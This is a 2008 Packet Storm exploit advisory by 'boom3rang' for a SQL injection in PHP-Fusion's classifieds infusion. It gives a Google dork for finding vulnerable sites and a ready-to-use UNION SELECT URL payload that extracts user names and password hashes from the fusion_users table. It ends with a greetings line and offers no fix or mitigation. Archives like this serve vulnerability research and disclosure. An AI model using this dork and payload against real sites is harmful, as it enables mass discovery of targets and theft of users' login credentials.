phpfusionclass-sql.txt

2008-06-29T00:00:00
ID PACKETSTORM:67780
Type packetstorm
Reporter boom3rang
Modified 2008-06-29T00:00:00

Description

                                        
                                            `#################################  
Php fusion "classifieds" SQL-injetion   
#################################  
  
++++++++++++++++++++++++++++  
Author : boom3rang  
contact : boomerang [at] knaqu-shqipe [dot] de  
webpage : www.khg-crew.ws   
++++++++++++++++++++++++++++  
  
  
  
----> Remote SQL Injection <------  
  
  
[+] Dork: inurl:"classifieds.php?op=detail_adverts"  
  
  
[+] Example: www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]  
  
  
  
exploit:  
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--  
  
  
  
##########################################  
greetz to: All my albanian brothers  
=United State of Albania =   
##########################################  
  
  
`